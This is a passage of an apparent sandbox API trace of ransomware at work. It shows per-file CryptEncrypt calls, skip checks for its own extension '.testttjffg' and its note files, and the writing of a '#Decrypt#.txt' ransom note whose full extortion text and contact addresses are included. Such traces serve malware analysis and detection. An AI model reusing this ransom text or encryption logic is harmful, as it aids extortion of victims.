(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm", lpSrch=".testttjffg") returned 0x0 [0245.795] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.796] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xce4037dd, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce4037dd, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa5ffafd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0245.796] lstrcmpiW (lpString1="Stars.jpg", lpString2="Windows") returned -1 [0245.796] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg") returned 71 [0245.796] StrStrIW (lpFirst="Stars.jpg", lpSrch=".horseleader") returned 0x0 [0245.796] lstrcmpW (lpString1="Stars.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.796] lstrcmpW (lpString1="Stars.jpg", lpString2="_uninstalling_.png") returned 1 [0245.796] lstrlenW (lpString=".testttjffg") returned 11 [0245.796] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg", lpSrch=".testttjffg") returned 0x0 [0245.796] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.797] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54403c2, 
ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54403c2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x452797c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x748, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Stucco.gif", cAlternateFileName="")) returned 1 [0245.797] lstrcmpiW (lpString1="Stucco.gif", lpString2="Windows") returned -1 [0245.798] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif") returned 72 [0245.798] StrStrIW (lpFirst="Stucco.gif", lpSrch=".horseleader") returned 0x0 [0245.798] lstrcmpW (lpString1="Stucco.gif", lpString2="#Decrypt#.txt") returned 1 [0245.798] lstrcmpW (lpString1="Stucco.gif", lpString2="_uninstalling_.png") returned 1 [0245.798] lstrlenW (lpString=".testttjffg") returned 11 [0245.798] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif", lpSrch=".testttjffg") returned 0x0 [0245.798] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.798] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.798] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc548c67c, ftCreationTime.dwHighDateTime=0x1ca0416, 
ftLastAccessTime.dwLowDateTime=0xc548c67c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4529f927, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Tanspecks.jpg", cAlternateFileName="")) returned 1 [0245.798] lstrcmpiW (lpString1="Tanspecks.jpg", lpString2="Windows") returned -1 [0245.798] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg") returned 75 [0245.798] StrStrIW (lpFirst="Tanspecks.jpg", lpSrch=".horseleader") returned 0x0 [0245.798] lstrcmpW (lpString1="Tanspecks.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.799] lstrcmpW (lpString1="Tanspecks.jpg", lpString2="_uninstalling_.png") returned 1 [0245.799] lstrlenW (lpString=".testttjffg") returned 11 [0245.799] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg", lpSrch=".testttjffg") returned 0x0 [0245.799] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.799] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.799] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.800] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54b27d9, ftCreationTime.dwHighDateTime=0x1ca0416, 
ftLastAccessTime.dwLowDateTime=0xc54b27d9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4573c389, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x121e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Tiki.gif", cAlternateFileName="")) returned 1 [0245.800] lstrcmpiW (lpString1="Tiki.gif", lpString2="Windows") returned -1 [0245.800] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif") returned 70 [0245.800] StrStrIW (lpFirst="Tiki.gif", lpSrch=".horseleader") returned 0x0 [0245.800] lstrcmpW (lpString1="Tiki.gif", lpString2="#Decrypt#.txt") returned 1 [0245.800] lstrcmpW (lpString1="Tiki.gif", lpString2="_uninstalling_.png") returned 1 [0245.800] lstrlenW (lpString=".testttjffg") returned 11 [0245.800] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif", lpSrch=".testttjffg") returned 0x0 [0245.800] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.800] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.800] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc535bb94, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc535bb94, 
ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4573c389, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x6860, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="To_Do_List.emf", cAlternateFileName="")) returned 1 [0245.800] lstrcmpiW (lpString1="To_Do_List.emf", lpString2="Windows") returned -1 [0245.800] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf") returned 76 [0245.800] StrStrIW (lpFirst="To_Do_List.emf", lpSrch=".horseleader") returned 0x0 [0245.801] lstrcmpW (lpString1="To_Do_List.emf", lpString2="#Decrypt#.txt") returned 1 [0245.801] lstrcmpW (lpString1="To_Do_List.emf", lpString2="_uninstalling_.png") returned 1 [0245.801] lstrlenW (lpString=".testttjffg") returned 11 [0245.801] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf", lpSrch=".testttjffg") returned 0x0 [0245.801] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.801] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.801] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.801] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54fea93, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54fea93, 
ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457ae7a3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc60, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="White_Chocolate.jpg", cAlternateFileName="")) returned 1 [0245.801] lstrcmpiW (lpString1="White_Chocolate.jpg", lpString2="Windows") returned -1 [0245.801] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg") returned 81 [0245.801] StrStrIW (lpFirst="White_Chocolate.jpg", lpSrch=".horseleader") returned 0x0 [0245.801] lstrcmpW (lpString1="White_Chocolate.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.801] lstrcmpW (lpString1="White_Chocolate.jpg", lpString2="_uninstalling_.png") returned 1 [0245.801] lstrlenW (lpString=".testttjffg") returned 11 [0245.801] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg", lpSrch=".testttjffg") returned 0x0 [0245.802] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.802] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.803] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5524bf0, ftCreationTime.dwHighDateTime=0x1ca0416, 
ftLastAccessTime.dwLowDateTime=0xc5524bf0, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457faa5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3ad7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Wrinkled_Paper.gif", cAlternateFileName="")) returned 1 [0245.803] lstrcmpiW (lpString1="Wrinkled_Paper.gif", lpString2="Windows") returned 1 [0245.803] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif") returned 80 [0245.803] StrStrIW (lpFirst="Wrinkled_Paper.gif", lpSrch=".horseleader") returned 0x0 [0245.803] lstrcmpW (lpString1="Wrinkled_Paper.gif", lpString2="#Decrypt#.txt") returned 1 [0245.803] lstrcmpW (lpString1="Wrinkled_Paper.gif", lpString2="_uninstalling_.png") returned 1 [0245.803] lstrlenW (lpString=".testttjffg") returned 11 [0245.803] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif", lpSrch=".testttjffg") returned 0x0 [0245.803] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.803] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.803] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5524bf0, 
ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5524bf0, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457faa5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3ad7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Wrinkled_Paper.gif", cAlternateFileName="")) returned 0 [0245.803] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.804] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\#Decrypt#.txt") returned 75 [0245.804] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.811] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.811] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.812] lstrlenA (lpString="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") returned 1368 [0245.813] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.813] CloseHandle (hObject=0x21c) returned 1 [0245.813] GetProcessHeap () returned 0x780000 [0245.813] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.813] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="TextConv", cAlternateFileName="")) returned 1 [0245.813] lstrcmpiW (lpString1="TextConv", lpString2="Windows") returned -1 [0245.813] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv") returned 59 [0245.813] lstrcmpW (lpString1="TextConv", lpString2=".") returned 1 [0245.813] lstrcmpW (lpString1="TextConv", lpString2="..") returned 1 [0245.813] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.813] GetProcessHeap () returned 0x780000 [0245.814] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7e1110 [0245.814] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*") returned 61 [0245.814] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.814] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.814] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\.") returned 61 [0245.814] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.814] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.814] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.814] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\..") returned 62 [0245.815] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.815] lstrcmpW (lpString1="..", lpString2="..") 
returned 0 [0245.815] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0245.815] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0245.815] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US") returned 65 [0245.815] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0245.815] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0245.815] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.815] GetProcessHeap () returned 0x780000 [0245.815] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.815] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*") returned 67 [0245.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xbc1c3940, dwReserved1=0xc27b3993, cFileName=".", cAlternateFileName="")) returned 
0x7c6760 [0245.815] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.815] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\.") returned 67 [0245.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.816] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xbc1c3940, dwReserved1=0xc27b3993, cFileName="..", cAlternateFileName="")) returned 1 [0245.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.816] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\..") returned 68 [0245.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.816] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xbc1c3940, dwReserved1=0xc27b3993, cFileName="..", cAlternateFileName="")) returned 0 [0245.816] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0245.816] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
